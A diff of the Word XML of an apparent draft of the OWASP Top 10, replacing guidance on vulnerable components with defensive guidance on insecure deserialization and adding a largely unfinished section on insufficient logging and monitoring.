+        <w:t xml:space="preserve">Application architecture has changed dramatically over the last few years, with the move to "server-less" API driven mobile and single page applications, with the associated rise of functional programming frameworks and languages. This seismic shift in application architecture were accompanied by the idea of the client maintaining state, to allow theoretical simpler and more scalable functional code. However, the hallmark of application security is the location of trusted state. Security state cannot be sent to the client without some form of integrity promise.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6101,157 +6378,185 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.</w:t>
+        <w:t xml:space="preserve">Applications and APIs will be vulnerable if the code:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1034"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The client can create, replay, tamper, or chain existing serialized state (gadgets), AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1034"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The server or API deserializes hostile objects supplied by an attacker, AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1034"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The objects contain a constructor, destructor, callbacks, auto-instantiation (such as rehydration calls) OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1034"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The objects override protected or private member fields that contain sensitive state, such as role or similar</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="112" w:name="how-do-i-prevent-8"/>
-      <w:bookmarkEnd w:id="112"/>
+      <w:bookmarkStart w:id="119" w:name="how-do-i-prevent-8"/>
+      <w:bookmarkEnd w:id="119"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1035"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The only safe architectural pattern is to not send or accept serialized objects from untrusted sources</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId113">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">versions</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId114">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">DependencyCheck</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId115">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">retire.js</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Continuously monitor sources like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId116">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">for vulnerabilities in your components. Use software composition analysis tools to automate the process.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Decide whether to upgrade component (and rewrite application to match if needed) or deploy a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId117">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">virtual patch</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited.</w:t>
+        <w:t xml:space="preserve">If this not possible</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Implement integrity checks or encryption of the serialized objects to prevent hostile creation, tampering, replay and gadget calls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Isolate code that deserializes, such that it runs in very low privilege environments, such as temporary containers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Enforce type constraints over serialized objects; typically code is expecting a particular class</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Larger and high performing organizations should also consider:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Rate limit API or methods that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Monitor deserialization, alerting if a user deserializes constantly.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="example-scenarios-7"/>
-      <w:bookmarkEnd w:id="118"/>
+      <w:bookmarkStart w:id="120" w:name="example-scenarios-7"/>
+      <w:bookmarkEnd w:id="120"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -6261,51 +6566,15 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Components almost always run with the full privilege of the application, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g., coding error) or intentional (e.g., backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Struts 2 Remote Code Execution – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Applications using a vulnerable version of either component are susceptible to attack as both components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit</w:t>
+        <w:t xml:space="preserve">TBA</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="references-8"/>
-      <w:bookmarkEnd w:id="119"/>
+      <w:bookmarkStart w:id="121" w:name="references-8"/>
+      <w:bookmarkEnd w:id="121"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -6314,8 +6583,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="120" w:name="owasp-7"/>
-      <w:bookmarkEnd w:id="120"/>
+      <w:bookmarkStart w:id="122" w:name="owasp-7"/>
+      <w:bookmarkEnd w:id="122"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -6324,11 +6593,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6341,11 +6610,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6358,11 +6627,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6375,11 +6644,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6390,156 +6659,30 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId114">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Dependency Check (for Java and .NET libraries)</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId121">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Virtual Patching Best Practices</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="123" w:name="external-6"/>
+      <w:bookmarkEnd w:id="123"/>
+      <w:r>
+        <w:t xml:space="preserve">External</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId122">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">The Unfortunate Reality of Insecure Libraries</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId123">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId116">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId115">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">Retire.js for detecting known vulnerable JavaScript libraries</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId124">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">Node Libraries Security Advisories</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId125">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">Ruby Libraries Security Advisory Database and Tools</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t xml:space="preserve">CWE-502: Deserialization of Untrusted Data (#3)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="a10-tba"/>
-      <w:bookmarkEnd w:id="126"/>
-      <w:r>
-        <w:t xml:space="preserve">A10 TBA</w:t>
+      <w:bookmarkStart w:id="124" w:name="axx-insufficient-logging-and-monitoring"/>
+      <w:bookmarkEnd w:id="124"/>
+      <w:r>
+        <w:t xml:space="preserve">AXX Insufficient logging and monitoring</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6786,10 +6929,46 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="am-i-vulnerable-to-attack-8"/>
+      <w:bookmarkStart w:id="125" w:name="am-i-vulnerable-to-attack-8"/>
+      <w:bookmarkEnd w:id="125"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">TBA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="126" w:name="how-do-i-prevent-9"/>
+      <w:bookmarkEnd w:id="126"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">TBA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="127" w:name="example-scenarios-8"/>
       <w:bookmarkEnd w:id="127"/>
       <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6804,55 +6983,19 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="how-do-i-prevent-9"/>
+      <w:bookmarkStart w:id="128" w:name="references-9"/>
       <w:bookmarkEnd w:id="128"/>
       <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="example-scenarios-8"/>
+        <w:t xml:space="preserve">References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="129" w:name="owasp-8"/>
       <w:bookmarkEnd w:id="129"/>
       <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="references-9"/>
-      <w:bookmarkEnd w:id="130"/>
-      <w:r>
-        <w:t xml:space="preserve">References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="owasp-8"/>
-      <w:bookmarkEnd w:id="131"/>
-      <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
     </w:p>
@@ -6860,11 +7003,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1035"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6877,11 +7020,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1035"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6894,11 +7037,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1035"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6911,11 +7054,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1035"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId40">
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6928,36 +7071,42 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="132" w:name="external-7"/>
+      <w:bookmarkStart w:id="130" w:name="external-7"/>
+      <w:bookmarkEnd w:id="130"/>
+      <w:r>
+        <w:t xml:space="preserve">External</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">CWE-223: Omission of Security-relevant Information (#5)</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">CWE-778: Insufficient Logging (#5)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="131" w:name="t-whats-next-for-security-testing"/>
+      <w:bookmarkEnd w:id="131"/>
+      <w:r>
+        <w:t xml:space="preserve">+T what's Next for Security Testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="132" w:name="establish-conitinuous-application-security-testing"/>
       <w:bookmarkEnd w:id="132"/>
-      <w:r>
-        <w:t xml:space="preserve">External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="133" w:name="t-whats-next-for-security-testing"/>
-      <w:bookmarkEnd w:id="133"/>
-      <w:r>
-        <w:t xml:space="preserve">+T what's Next for Security Testing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="establish-conitinuous-application-security-testing"/>
-      <w:bookmarkEnd w:id="134"/>
       <w:r>
         <w:t xml:space="preserve">Establish Conitinuous Application Security Testing</w:t>
       </w:r>
@@ -7240,7 +7389,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId135">
+            <w:hyperlink r:id="rId133">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7257,7 +7406,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId136">
+            <w:hyperlink r:id="rId134">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7271,7 +7420,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId137">
+            <w:hyperlink r:id="rId135">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7285,7 +7434,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId138">
+            <w:hyperlink r:id="rId136">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7299,7 +7448,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId139">
+            <w:hyperlink r:id="rId137">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7313,7 +7462,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId140">
+            <w:hyperlink r:id="rId138">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7327,7 +7476,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId141">
+            <w:hyperlink r:id="rId139">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7341,7 +7490,7 @@
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId142">
+            <w:hyperlink r:id="rId140">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -7390,7 +7539,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId143">
+      <w:hyperlink r:id="rId141">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7407,7 +7556,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId144">
+      <w:hyperlink r:id="rId142">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7421,7 +7570,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
